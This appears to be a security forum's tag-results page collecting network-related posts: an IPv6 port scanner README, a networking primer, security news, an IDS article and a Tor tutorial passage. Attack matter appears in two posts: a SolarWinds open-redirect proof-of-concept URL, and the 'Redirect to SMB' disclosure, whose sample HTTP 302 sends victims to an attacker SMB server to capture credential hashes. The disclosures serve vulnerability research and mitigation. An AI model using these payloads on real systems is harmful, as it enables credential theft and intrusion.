Jump to content

Search the Community

Showing results for tags 'network'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. fi6s: Fast IPv6 scanner fi6s is a IPv6 port scanner designed to be fast. This is achieved by sending and processing raw packets asynchronously. The design and goal is pretty similar to Masscan, though it is not as full-featured yet. Building Building should be fairly easy on up-to-date distros. On Ubuntu 16.04 (xenial) it looks like this: # apt install gcc make git libpcap-dev $ git clone https://github.com/sfan5/fi6s.git $ cd fi6s $ make BUILD_TYPE=release The scanner executable will be ready in at ./fi6s. Note that fi6s is developed solely on Linux, thus it probably won't compile on non-Linux OSs (notably Windows). Usage: Usage is pretty easy, fi6s will try to auto-detect the dirty technical details (source/dest MAC, source IP). # ./fi6s -p 80,8000-8100 2001:db8::/120 This example will: scan the 2001:db8::/120 subnet (256 addresses in total) scans port 80 and ports 8000 to 8100 (102 ports in total) output scan results to stdout in the "list" format There are more different ways of specifying an address range to scan, if you aren't sure what's about to happen invoke fi6s with --echo-hosts and it will print every host that would've been scanned. For advanced features please consult the output of ./fi6s -h. Grabbing banners Since fi6s has its own TCP stack, the OS stack needs to disabled to avoid interference with banner grabbing (RST packets). This is most easily done using ip6tables and a constant --source-port. Banner grabbing is then enabled by passing --banners: # ip6tables -A INPUT -p tcp -m tcp --dport 12345 -j DROP # ./fi6s -p 22 --banners --source-port 12345 2001:db8::/120 Download: fi6s-master.zip or: git clone https://github.com/sfan5/fi6s.git Source
  2. Salut, acesta este un tutorial destinat celor ce doresc sa se apuce de networking dar si celor cu experienta pentru o scurta reamintire a unor lucruri foarte importante. Packet: un pachet este o unitate de date ce este rutata intre o regiune si o destinate de pe internet. Network Interface: O interfata de internet se refera la interfata programului pentru placa de retea(SOFTWARE->HARDWARE). Ca exemplu(luat dupa alt website): daca ai 2 placi de retea in unitatea ta fiecare poate fi controlata si configurata cu programul asociat ei. LAN(Local Area Network): LAN-ul se refera la o portiune mica din internet care nu poate fi accesata de majoritatea celor ce navigheaza pe internet. De exemplu la calculatoarele din laboratorul de informatica din facultatea mea toate calculatoarele sunt legate in retea(LAN). WAN(Wide Area Network): WAN-ul este o retea mult mai raspandita decat LAN-ul Protocol: Un protocol este un set de reguli care defineste un limbag prin care dispozitivele pot comunica. Niste exemple de protocoale sunt: TCP,UDP,IP,ICMP. Prin aceste protocoale functioneaza: HTTP, SSH, TLS/SSL, FTP si multe altele. Port: Un port este o adresa pornita pe un singur calculator care este legata catre un anumit software. Exemplu: HTTP are portul 80 Firewall: Este un program care decide ce trafic sa primeasca sau sa iasa dintr-un anumit calculator NAT: Este o cale de a "traduce" request-urile care intra intr-un server catre un server sau o piesa. VPN(VIrtual private network): el creeaza o cale sigura prin care poti naviga printr-o retea publica, mai precis iti ascunde ip-ul tau real inlocuindu-l cu cel de la capatul la care te conectezi. Daca am gresit cu ceva, va rog frumos sa ma corectati! O sa revin in scurt timp(cateva zile) cu un tutorial despre protocoale(ce fac cele, tipuri de protocoale, cum ne ajuta, cum functioneaza)
  3. A new social network has been launched, vowing more transparency, security, and privacy than Facebook and other social media giants. Backed by the hacktivist group Anonymous, it will encrypt all messages, shielding data from governments and advertisers. At first glance, Minds.com appears similar to any other social network. It provides a person's followers with the latest updates, allowing their friends to comment and promote posts. But the major difference exists behind the scenes. Minds.com doesn't aim to profit from gathering data. In fact, its goal is the opposite – to encrypt all messages so they can't be read by governments or advertisers. The social network will also reward users for interacting with posts. This can be done by voting, commenting or uploading. The rewards will come in the form of points, which can be exchanged for “views” of your posts. Simply put, the more active you are, the more your posts will be promoted by the social network. Mai mult aici:Anonymous backs new encrypted social network to rival Facebook — RT News https://www.minds.com/
  4. The nation’s first ever criminal case involving a hijacked wireless Internet connection came to light this month, prompting online security experts to warn that home Wi-Fi routers may be open to attack if not properly protected. Users need to set a password and switch on encryption, or their network can be hacked within minutes by someone close enough to eavesdrop on the wireless signal, such as a user in an adjacent apartment, said Yuichi Nozawa, a consultant with the government-affiliated Information-technology Promotion Agency (IPA), a body that advises on digital security. Cracking the security itself is relatively simple for one common form of encryption and can be done using free software. The IPA delivered the warning last Friday, a day after the rearrest of a man suspected of tapping into a nearby Wi-Fi network in Matsuyama, Ehime Prefecture. Hirofumi Fujita, 30, is separately on trial for allegedly stealing ¥16 million by obtaining online banking IDs and passwords as well as sending computer viruses to gain unauthorized remote access to other people’s computers. Moreover, the agency warned that hackers can use hijacked wireless networks to hide their identities, leading “even ordinary people with no criminal intention” to become the main suspects in cybercrimes, Nozawa said Monday. He said police sometimes identify suspects by the Internet access point used. A further problem lies in the fact that it is not easy for ordinary users to detect if their network has been hacked, he said. Many users remain unaware of the risks. In 2014, the IPA reported that more than 50 percent of households either had not set password protection on their home wireless network or were unsure whether it was active. But even if a wireless network is password-protected, it needs to use a newer form of encryption, as older ones can be cracked fairly easily. Older routers may offer Wired Equivalent Privacy (WEP) encryption as the default setting, which Nozawa said can be hacked. The alleged Ehime hacker is suspected of using this technique, deploying software that came as a free gift with an IT security magazine. Instead, Nozawa recommends using Wi-Fi Protected Access II, better known as WPA2, a higher form of encryption and one usually offered by newer network devices. The IPA recommends contacting manufacturers’ support teams to find out how to configure the security settings, as the procedure varies from device to device. Source
  5. Virtual private network Hola has downplayed concerns that its 47 million users could become part of a botnet. A botnet is a network of hijacked computers that can be used for criminal activity without the knowledge of their owners. Hola says it has always been open about sending other data via users' devices when they are not in use. However, in a blog post chief executive Ofer Vilenski acknowledged the firm had "made some mistakes". The Israeli company offers a free service but on the condition it can use customers' bandwidth "securely". Mr Vilenski said he had wrongly assumed that describing the network as "peer-to-peer" had made that clear. It also operates a commercial network called Luminati, which can be used to "route data through any of our millions of IPs [computer addresses] that are located in every city around the world", according to its website. The website goes on to say the Luminati network consists of "personal PCs, laptops and mobile devices of participating users". They are the private devices of Hola users, it has been claimed. "The concern with Hola is that it appears to operate like a botnet, and one that is potentially insecure at that," said cybersecurity expert Prof Alan Woodward, from Surrey University. "There is mounting anecdotal evidence that the network is being used as a real botnet. "I haven't seen that in practice but the way in which the service can use your machine appears to have the potential to do something like that." People often use virtual private networks to access internet content that is unavailable in their home country - such as video streaming services Netflix and the BBC iPlayer - but most VPNs are not free. Ofer Vilenski said in his blog post that Hola generated revenue by offering the VPN for "legitimate commercial purposes" only. "We have a record of the real identification and traffic of the Luminati users, such that if a crime is committed, we can report this to the authorities, and thus the criminal is immediately identified," he wrote. Last week, the founder of message board 8Chan said the site had suffered a distributed denial of service (DDOS) attack - when a website is overwhelmed by false requests from computers - that could be traced back to the Luminati network. Mr Vilenski accepted that a spammer had "passed through our filters" to use the service but added that the account had been terminated and "necessary measures" put in place. He said that the firm would shortly begin a "bug bounty programme" offering rewards for people who identified security weaknesses in Hola and Luminati products. Prior to the blog post hundreds of people had already posted on community site Reddit, calling for users to uninstall the network over fears that their devices could unintentionally be used for criminal activity, and Android users have been leaving warning messages in the review section of the app on Google's Play Store. In the FAQ section on its website, updated on 29 May, Hola explains how its "peer-to-peer" model works. "When your device is not in use, other packets of information from other people may be routed through your device," it says. "Hola does this securely, not allowing any access to any of your information. Your device is used only as a router." It also says that users of its premium service, for a monthly fee of $4.99 (£2.28), are not part of the network. Source
  6. # Affected software: SolarWinds Network Performance Monitor # Type of vulnerability:url redirection # URL:http://www.solarwinds.com/ # Discovered by: provensec # Website: provensec.com #version:N/A # Proof of concept http://oriondemo.solarwinds.com/Orion/Login.aspx?ReturnUrl=//google.com Source
  7. SPEAR - Redirect to SMB April 13, 2015 By Brian Wallace We’ve uncovered a new technique for stealing sensitive login credentials from any Windows PC, tablet or server, including ones running previews of the yet-to-be-released Windows 10 operating system. Software from at least 31 companies including Adobe, Apple, Box, Microsoft, Oracle and Symantec can be exploited using this vulnerability, which we have dubbed Redirect to SMB. Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue. Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password. We are publishing a white paper that describes the issue in detail, and offers mitigation methods for both developers and computer users. For technical details, download the Redirect To SMB white paper. Original Attack The Redirect to SMB attack builds on a vulnerability discovered in 1997 by Aaron Spangler, who found that supplying URLs beginning with the word “file” (such as file://1.1.1.1/) to Internet Explorer would cause the operating system to attempt to authenticate with a SMB server at the IP address 1.1.1.1. It’s a serious issue because stolen credentials can be used to break into private accounts, steal data, take control of PCs and establish a beachhead for moving deeper into a targeted network. These “file” URLs could be provided as an image, iframe, or any other web resource resolved by the browser. We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server. RedirectToSMB-Diagram-1 While conducting previous research on network protocols, we had experimented with redirecting ordinary HTTP requests to web servers to identify new attacks. So we were curious to see what threats SMB posed when combined with redirects. We created an HTTP server in Python that answered every request with a simple HTTP 302 status code to redirect clients to a file:// URL, and using that we were able to confirm that an http:// URL could lead to an authentication attempt from the OS. GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0,( Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Endoding: gzip, deflate Host: 192.168.36.207 DNT: 1 Connection: Keep-Alive HTTP/1.1 302 Found Content-Type: text/html Location: file://192.168.36.207/mitmproxy-identifier Content-Length: 0 RedirectToSMB-Diagram-02 Increased Attack Surface We identified four commonly used Windows API functions that allow for redirection from HTTP/HTTPS to SMB. Early testing found that they are used by a wide range of software features such as updaters and usage reporting tools. This discovery opened up a wide range of new attack methods. When combined with a man-in-the-middle attack, an attacker can force authentication attempts with an SMB server using susceptible applications and services that transmit data over HTTP or HTTPS. RedirectToSMB-Diagram-03 Affected Applications We tested dozens of application in our lab, uncovering 31 vulnerable software packages, which we disclosed to CERT at Carnegie Mellon University on Feb. 27, 2015. They include: Widely Used Applications: Adobe Reader, Apple QuickTime and Apple Software Update (which handles the updating for iTunes) Microsoft Applications: Internet Explorer, Windows Media Player, Excel 2010, and even in Microsoft Baseline Security Analyzer Antivirus: Symantec’s Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus Security Tools: .NET Reflector, Maltego CE Team Tools: Box Sync, TeamViewer Developer Tools: Github for Windows, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer Impact Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic. Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB attacks on shared WiFi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools. Examples The following examples show different attacks that could be conducted. In order to effectively demonstrate attack scenarios, the conditions have been simplified. The following are the IP addresses of the computers in the examples: • 192.168.36.207 – The Attacker • 192.168.36.247 – The Victim • 192.168.36.128 – The Router/Internet Gateway The tools in the examples are as follows: • SMBTrap2 • SMBTrap-mitmproxy-inline.py • MITMProxy • Zarp Additional attack examples are discussed in the white paper. Attacking AVG via ARP Poisoning Attacking Microsoft Baseline Security Analyzer via modified DNS record Encrypted Credentials While the user credentials sent over SMB are commonly encrypted, the encryption method used was devised in 1998 and is weak by today’s standards. A stronger hashing algorithm being used on these credentials would decrease the impact of this issue, but not as much as disabling automatic authentication with untrusted SMB servers. With roughly $3,000 worth of GPUs, an attacker could crack any 8-character password consisting of letters (upper and lower case) as well as numbers in less than half a day. Mitigations Microsoft has yet to release a patch to fix the Redirect to SMB vulnerability. The simplest workaround is to block outbound traffic from TCP 139 and TCP 445 -- either at the endpoint firewall or at the network gateway’s firewall (assuming you are on a trusted network). The former will block all SMB communication, which may disable other features that depend on SMB. If the block is done at the network gateway’s firewall, SMB features will still work inside the network, but prevent authentication attempts with destinations outside the network. See the white paper for other mitigation steps. Microsoft did not resolve the issue reported by Aaron Spangler in 1997. We hope that our research will compel Microsoft to reconsider the vulnerabilities and disable authentication with untrusted SMB servers. That would block the attacks identified by Spangler as well as the new Redirect to SMB attack. NO-MERCY Me & i & My self -> lIKE mICROSOFT :) Source ; SPEAR - Redirect to SMB & yOU Can See this Post too ; 18-year-old Unpatched Vulnerability Affects All Versions of Microsoft Windows
  8. Intrusion systems have been the subject of considerable research for decades to improve the inconsistencies and inadequacies of existing methods, from basic detectability of an attack to the prevention of computer misuse. It remains a challenge still today to detect and classify known and unknown malicious network activities through identification of intrusive behavioral patterns (anomaly detection) or pattern matching (misuse or signature-based detection). Meanwhile, the number of network attack incidents continues to grow. Protecting a computer network against attacks or cybersecurity threats is imperative, especially for companies that need to protect not only their own business data but also sensitive information of their clients as well as of their employees. It is not hard to see why even just one breach in data security from a single intrusion of a computer network could wreak havoc on the entire organization. Not only would it question the reliability of the networks’ infrastructure, but it could also seriously damage the business’s reputation. An organization’s first defense against breaches is a well-defined corporate policy and management of systems, as well as the involvement of users in protecting the confidentiality, integrity, and availability of all information assets. Security awareness training is a baseline for staff to gain the knowledge necessary to deter computer breaches and viruses, mitigate the risks associated with malicious attacks, and defend against constantly evolving threats. Users’ awareness and strict IT policies and procedures can help defend a company from attacks, but when a malicious intrusion is attempted, technology is what helps systems administrators protect IT assets. When it comes to perimeter data security, traditional defense mechanisms should be in layers: firewalls, intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be used. Research and new developments in the field of IDPS (Intrusion Detection and Prevention System) prove different approaches to anomaly and misuse detection can work effectively in practical settings, even without the need of human interaction/supervision in the process. Several case studies emphasize that the use of Artificial Neural Networks (ANN) can establish general patterns and identify attack characteristics in situations where rules are not known. A neural network approach can adapt to certain constraints, learn system characteristics, recognize patterns and compare recent user actions to the usual behavior; this allows resolving many issues/problems even without human intervention. The technology promises to detect misuse and improve the recognition of malicious events with more consistency. A neural network is able to detect any instances of possible misuse, allowing system administrators to protect their entire organization through enhanced resilience against threats. This article explores Artificial Intelligence (AI) as a means to solve the difficulties in identifying intrusions of insecure networks, such as the Internet, and discusses the use of artificial neural networks (ANN) for effective intrusion detection to detect patterns that separate attacks from genuine traffic. It will clarify why ANN technology offers a promising future in the identification of instances of misuse against computer systems. Furthermore, the article will also point out the different directions in which research on neural networks concentrate and the developments and expected future in the intrusion detection and prevention (IDPS) field. IDS & IPS Technology: Detection and Prevention Techniques With computer intrusions—the unauthorized access or malicious use of information resources—becoming more common and a growing challenge to overcome, IT professionals have come to rely more on detection and prevention technologies to protect availability of business-critical information resources and to safeguard data confidentiality and integrity. IDS tools sniff network packet traffic in search of interferences from external sources and can spot a hacker attempting to gain entry; they are designed to detect threats, misuse or unauthorized access to a system or network and are able to analyze system events for signs of incidents. Using both hardware and software, IDSs can detect anything that is suspicious either on a network or host; they then create alarms that system administrators can review to spot possible malicious entries. Intrusion detection systems (IDS) can be classified as: Host based or Network based with the former checking individual machines’ logs and the latter analyzing the content of network packets; Online or Offline, capable of flagging a threat in real-time or after the fact to alert of a problem; Misuse-based or Anomaly-based, either specifically checking a deviation from a routine behavior or comparing activities with normal, known attackers’ behavior. While an IDS is designed to detect attacks and alert humans to any malicious events to investigate, an IPS is used to prevent malicious acts or block suspicious traffic on the network. There are four different types of IPS: network-based intrusion prevention system (NIPS) that looks at the protocol activity to spot suspicious traffic; wireless intrusion prevention system (WIPS) that analyzes wireless networking protocols and is so important in the BYOD and mobile-centric world; network behavior analysis (NBA) that can spot attacks that create unusual traffic, such as distributed denial of service (DDoS) attacks, and it can use anomaly-based detection and stateful protocol analysis; and host-based intrusion prevention system (HIPS) that can be installed on single machines and can use signature-based and anomaly-based methods to detect problems. IDS and IPS tools are often used concurrently, as they are not mutually exclusive. Thus IDPS can offer twice the protection. Security technologist and chief technology officer of Co3 Systems Bruce Schneier mentions, “Good security is a combination of protection, detection, and response.” That just happens to be what IDPS does; it is deployed for information gathering, logging, detection and prevention. These tools provide threat identification capabilities, attack anticipation, and more. Having a network-based IDPS (NIDPS) with signature-based and anomaly-based detection capabilities allows inspecting the content of all the traffic that traverses the network. NIDPS are essential network security appliances that help in maintaining the security goals. They are highly used, as Indraneel Mukhopadhyay explains, for “identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.” The all familiar Snort—an open-source NIDPS—is a highly used free threat intelligence program, created by Martin Roesch in 1998, that is capable of real-time traffic analysis and packet logging; it utilizes a rules-based detection engine to look for anomalous activity. What makes it a popular choice is its easy-to-use rule language. It can protect even the largest enterprise networks. Snort is an IP-centric program; administrators can view system security logs and find any irregularities or issues relating to things such as improper access patterns. Snort is said to be the most widely deployed intrusion prevention system in the world. Deploying IDS and IPS devices requires a specialized skill set to ensure it properly identifies abnormal traffic and alert network administrator as needed. Along with proper configuration to a predefined rule set, provided by the administrator, these devices need to be fine-tuned (as new threats are discovered) in order to weed out false positives and be adjusted to specific network parameters (when the infrastructure has been altered) to maximize accuracy. Once the type of IDPS technology has been selected, it is key to determine how many components (sensors, agents) will need to be deployed to function accurately to capture security issues, process events and alert appropriate personnel of suspicious activities. Direct network monitoring of the IDPS components like inline sensors between the firewall and the Internet border router is essential to achieve detection and prevention of malicious activity, such as denial of service attacks committed by an intruder. IDPS agents installed on endpoints can not only monitor the current network but also can assign appropriate priorities to alerts. Past and Present of IDSs IDPSs are able to monitor the events of interests on the systems and/or networks and are then able to identify possible incidents, log information about them, and attempt to stop common attacks and report them to security administrators. In the past, Intrusion Detection and Prevention (IDPS) has either been signature-based (able to check activity against known attackers’ patterns, the signature), anomaly-based (also referred to as heuristic, that alerts when traffic and activity are not normal), or based on stateful protocol analysis that looks at the “state” in a connection and “remembers” significant events that occur. These methods are effective but do have some downfalls. IDSs are known to have two main problems: the number of alarms generated and the need for tuning. Anomaly-based detection, for example, needs training and if issues arise during the training period a malicious behavior might be “learned” as legitimate by the system; it’s also prone to many false positives. When analysis is based on rules provided by a vendor or an administrator, instead, updates must be frequent to ensure the proper functioning of the system. The number of alarms generated (many being false) can overwhelm system security managers and prevent them from quickly identifying real ones. The continuous tuning of the intrusion to detect the slightest of variances and training required in order to maintain sufficient performance remains an issue. With a growing number of intrusion events, there is the need to use innovative intrusion detection techniques for critical infrastructure network protection. Research has concentrated on Artificial Neural Networks (ANNs) that can provide a more flexible approach to intrusion prevention in terms of learning. As the need for reliable automatic IDPS builds up, for it to gain acceptance as a viable alternative, it needs to function at a sufficient level of accuracy. That is where Neural Networks and Artificial Intelligence can play an effective role in the improvement of ID systems with the ability to learn from previous episodes of intrusion to identify new types of attack with less analyst interaction with the ID itself. In fact, information system experts believe that Artificial Intelligence (AI) can provide significant improvements to IDS/IPS systems, especially in terms of effectiveness and decreased false positive/negative rates, a major issue in intrusion management. Next Generation Intrusion Detection and Prevention (IDPS) Due to a new generation of hackers that are better organized and equipped than in the past, to get past perimeter security, it is clear that a different approach is required, says Joshua Crumbaugh, lead penetration tester at Tangible Security, Inc., NagaSec. As per the DRAFT Special Publication 800-94 Revision 1, Guide to …, the Next-Generation IDPS for host and network-based deployment options will have automated identification, location, isolation, and resolution of threats in real-time. A GCN staff post, “What’s next in cybersecurity automation,” provides insight on the Enterprise Automated Security Environment (EASE) concept for “shared situational awareness in cyber-relevant time” and, with the concerted efforts of government and private sector interests, the concept may foster continuous innovation for cyberspace defense across the board. Other than EASE, the US Government has already evaluated other options to defend against cyber-attacks that mine homeland security. It pursued, for example, as a project to develop a smart network of sensors (named Einstein) to detect cyber-attacks against critical infrastructures. IPS/IDS has changed, as research shows, with AI techniques that have improved IDSs by making them capable of detecting both current and future intrusion attacks while triggering fewer false positives and negatives. New ANNIDS (Neural networks applied to IDS) techniques have been able to improve the way detection systems are trained to recognize patterns, conduct problem solving and fault diagnosis too. In today’s world, there is the need “for building high-speed, reliable, robust and scalable ANN-based network intrusion detection and prevention system that is highly useful for [humankind] and organizations,” Mukhopadhyay says. Neural network based AIs are able to discover emergent collective properties that are too complex to be noticed by either humans or other computer techniques. AI based techniques are used to classify behavior patterns of a user and an intruder in a way that minimizes false alarms from happening, explains Archit Kumar, India, an M.Tech Student, Department of CSE, in a research paper for IJARCSMS. IDS based on ANN uses algorithms that can analyze the captured data and judge whether the data is intrusion or not by means of behavioral analysis of the neural computation during both learning and recall. Although ANNIDS’ main drawbacks are lower detection precision for low-frequent attacks, and weaker detection stability in the beginning, it is a suitable solution for intrusion detection and network security, says Suresh Kashyap, an Indian research scholar at the Dr. C.V. Raman University. He adds that ANNIDS can be trained and tested by customized datasets enabling it to identify known and unknown (new) attacks with increasing accuracy when other methods fail. Current AI techniques for improving automation of the intrusion detection process are not easily deployable in real life, yet many experiments and tests have been carried out with results showing ANNs capable of detecting intrusive activity in a distributed environment to provide local “threat-level” monitoring of computer DDoS attacks before the successful completion of an intrusion. ANN s are great in terms of learning capabilities and effectiveness in capturing anomalies in activities, but also have some significant downfalls, such as, for example, the requirement of high computational resources. Researchers have been working on resolving this issue by trying to find a way to help ANN systems process info faster and effectively. An approach using AI techniques combined with genetic algorithms and fuzzy logic, for instance, proved well suited for detecting malicious behavior in distributed computer systems. Research concentrated also on the possibility to clustered data in subgroups using fuzzy clustering to use then a different ANN on each set. Results are obtained faster and are then aggregated to have a complete picture. Another method explored more recently is deploying new ANN-based intelligent hybrid IDS models for anomaly detection that involve network- and host-based technologies under a single management console. These are also applicable to many environments: from Grid and Cloud Computing to mobile and network computers. In such an architecture, a Distributed Intrusion Detection System (DIDS) that relies on network and host based sensors is apt to increase the efficiency of the system yielding fast results of abnormal data determined by multiple heterogeneous recognition engines and management components to solve security issues. Conclusion Whether it is through a hybrid IDS using honey pot technology and anomaly detection or artificial neural network (ANN) based IDSs techniques, it is essential to detect and prevent attacks immediately as attempted. Information security practitioners suggest organizations are confident that their security control mechanism in place are sufficient enough for the protection of computer data and programs, but apparently, as per the PwC findings from the 2014 US State of Cybercrime Survey, a good majority of them fail to assess for threats or place emphasis on prevention mechanisms. What’s more, they also lack the ability to diagnose and troubleshoot less sophisticated attacks and have yet to consider where IDS/IPS fits in their security plan. Both system solutions work together and form an integral part of a robust network defense solution. As per the annual Worldwide Infrastructure Security Report (WISR) that provides insight into the Global Threat Landscape, organizations will face even more concerns regarding APT, so they ought to step up their network security defenses with near-real-time intrusion detection to defend critical data and applications from today’s sophisticated attacks. The new reality in IT security is that network breaches are inevitable, and the ability to monitor and control access and behavior patterns and misuse relies upon intrusion detection and prevention methods to be more quickly identified and more effectively addressed. An IDS/IPS is a must-have device; an ANN model based on ESNN learning patterns and classifying intrusion data packets is an effective approach. The main advantages of the ANNs over traditional IDSs are their abilities to learn, classify, process information faster, as well as their ability of self-organization. For these reasons, Neural Networks can increase the accuracy and efficiency of IDSs and AI techniques can improve IDS/IPS effectiveness. References Brecht, D. (2010, April 15). Network Intrusion Detection Systems: a 101. Retrieved from What is a Network Intrusion Detection System (NIDS)? Compare Business Products (2014, March 18). Security: IDS vs. IPS Explained. Retrieved from Security: IDS vs. IPS Explained | Reviews, Comparisons and Buyer's Guides GCN. (2014, December 9). What’s next in cybersecurity automation. Retrieved from What’s next in cybersecurity automation -- GCN Infosecurity Magazine. (2011, October 21). Small enterprises are suffering more intrusions, survey finds. Retrieved from Small enterprises are suffering more intrusions, survey finds - Infosecurity Magazine InfoSight Inc. (n.d). Intrusion Detection (IDS) & Intrusion Prevention (IPS). Retrieved from Intrusion Detection (IDS) & Intrusion Prevention (IPS) – InfoSight Inc Kashyap, S. (2013, May). Importance of Intrusion Detection System with its Different approaches. Retrieved from http://www.ijareeie.com/upload/may/24_Importance.pdf Kumar, A. (2014, May). Intrusion detection system using Expert system (AI) and […]. Retrieved from http://www.ijarcsms.com/docs/paper/volume2/issue5/V2I5-0064.pdf Mukhopadhyay, I. (2014). Hardware Realization of Artificial Neural Network Based Intrusion Detection & Prevention System. Retrieved from http://file.scirp.org/Html/3-7800230_50045.htm Onuwa, O. (2014, November 29). Improving Network Attack Alarm System: A Proposed Hybrid Intrusion Detection System Model. Retrieved from http://www.computerscijournal.org/vol7no3/improving-network-attack-alarm-system-a-proposed-hybrid-intrusion-detection-system-model/ Saied, A. (n.d.). Artificial Neural Networks in the detection of known and unknown DDoS attacks: Proof-of-Concept. Retrieved from http://www.inf.kcl.ac.uk/staff/richard/PAAMS-WASMAS_2014.pdf Surana, S. (2014). Intrusion Detection using Fuzzy Clustering and Artificial Neural Network. Retrieved from http://www.wseas.us/e-library/conferences/2014/Gdansk/FUNAI/FUNAI-32.pdf Vieira, K. (2010, August). Intrusion Detection for Grid and Cloud Computing. Retrieved from http://www.inf.ufsc.br/~westphal/idscloud.pdf Wang, L. (n.d.). Artificial Neural Network for Anomaly Intrusion Detection. Retrieved from https://www.cs.auckland.ac.nz/courses/compsci725s2c/archive/termpapers/725wang.pdf Zakaria, O. (n.d.). Identify Features and Parameters to Devise an Accurate Intrusion Detection System Using Artificial Neural Network. Retrieved from http://www.academia.edu/2612588/Identify_Features_and_Parameters_to_Devise_an_Accurate_Intrusion_Detection_System_Using_Artificial_Neural_Network Zamani, M. (2013, December 8). Machine Learning Techniques for Intrusion Detection. Retrieved from http://arxiv.org/pdf/1312.2177.pdf Source
  9. Defense in depth is dead. The way you’re thinking about data center security is outdated. Security started changing long before Sony, Target and the others got hacked. The problem starts with your perimeter. During a conversation with Pete Lindstrom of IDC, we paused to consider the state of defense in depth. “Circling wagons is just impossible,”Pete said. “With apps strewn across the internet, if a corporation thinks they can build perimeter around all their apps then they are nuts.” By expanding the definition of cloud computing to include cloud-based accounting, CRM, email services, and development tools, people discover that their organizations have been using cloud for years, without fully realizing it. In 2014, IDC reported that 69% of enterprises worldwide have at least one application or a portion of their computing infrastructure in the cloud. In Europe, adoption is also growing but at a slightly slower rate, with 19% of EU enterprises using cloud computing in 2014, according to the European Union‘s Eurostat. Bottom line: more enterprise data is living outside of the protected data center. When your definition of defense in depth is adding layers of security to the data center perimeter and physical data segmentation, modern cloud applications are indeed insecure. Instead, the enterprise should focus on the application, data, and user as the important security layers. In a 2015 report from Accenture and the Ponemon Institute, the authors note that proactive organizations are prioritizing network traffic anomalies, identifying vulnerabilities and limiting unauthorized data sharing, while the “static” companies focus on employees’ device security and data backup. Let’s examine the Sony Pictures hack. The Sony hackers gained access through former employees’ accounts, and easily cracked the perimeter. The real damage occurred once they exploited the weak internal network security. All the critical applications – email servers, accounting data, and copyrighted motion pictures – were all connected “on a wire” inside the corporate network. The perimeter-heavy, fortify-the-exterior approach to security is indeed dead. In fact, when it fails to stop cybercrime, this strategy can cost you upwards of $100M. Each enterprise application should be considered critical and deserves its own perimeter inside any network environment. With Sony, or any organization, critical data means all data. For a manufacturer, critical data might be product designs as well as the obvious accounting and customer data. Plus, nearly 85% of insider attacks or “privilege misuse” attacks used the target enterprises’ corporate local area network (LAN), according to a 2014 Verizon security report. To truly guard and protect an application, enterprises need to control all data and network traffic via secure, encrypted switches at every layer within a network. Defense shouldn’t end at the data center pediment, but extend down to each individual application. Monitored access, encryption, and application-specific firewall rules can all but eliminate malicious “east/west” movement inside a network. This approach to application-specific defense in depth continues the concept of physical segmentation into “application segmentation.” Each application owner within an organization can dictate how traffic flows to each application server through an encrypted network switch. When data passes through a secure application perimeter, application owners can easily monitor and isolate traffic and prevent unauthorized access. Even with only basic interior firewall rules, this enterprise can protect themselves from a Sony-style data exploit. Source
  10. Introduction When it comes to anonymizing activities in digital world, it can be referred to in various ways. Researchers might take it to identify various malicious activities and for back trailing, whereas hackers can anonymize their activities so as to build up a cover around their malicious activities. These anonymizing activities can really increase the work of researchers, as they can’t trust the attributes mentioned in the logs like IP address, user agent, etc. as such attributes will only give you false information. In this article series, we will learn about anonymizing activities from very basic level to an advanced level. Anonymity with TOR The Onion Router, widely known as TOR, is famous for staying anonymous on the Internet. Tor is a network of computers around the world that forward requests in an encrypted manner from the start of the request until it reaches the last machine in the network, which is known as an exit node. From the last node the TOR network, the request is decrypted and sent to the destination server. Thus exit nodes are the first nodes and last nodes in the TOR network for receiving and sending traffic from and to the original and destination server. Thus, to the destination server all traffic seems to come from the exit node in the TOR network, thus hiding the IP address of the original sender. Even the other systems in the TOR network cannot determine location either, because they are essentially forwarding traffic with no knowledge of where it actually originated. The responses to original requests will return to the system, but as far as the TOR network is concerned, a request is just another hop along the way. SOCKS server TOR works with the SOCKS protocol, so it is worth talking about SOCKS. A SOCKS server establishes a proxy TCP connection with another server on behalf of the client and then routes all the traffic back and forth between the client and the server. It works for any kind of network 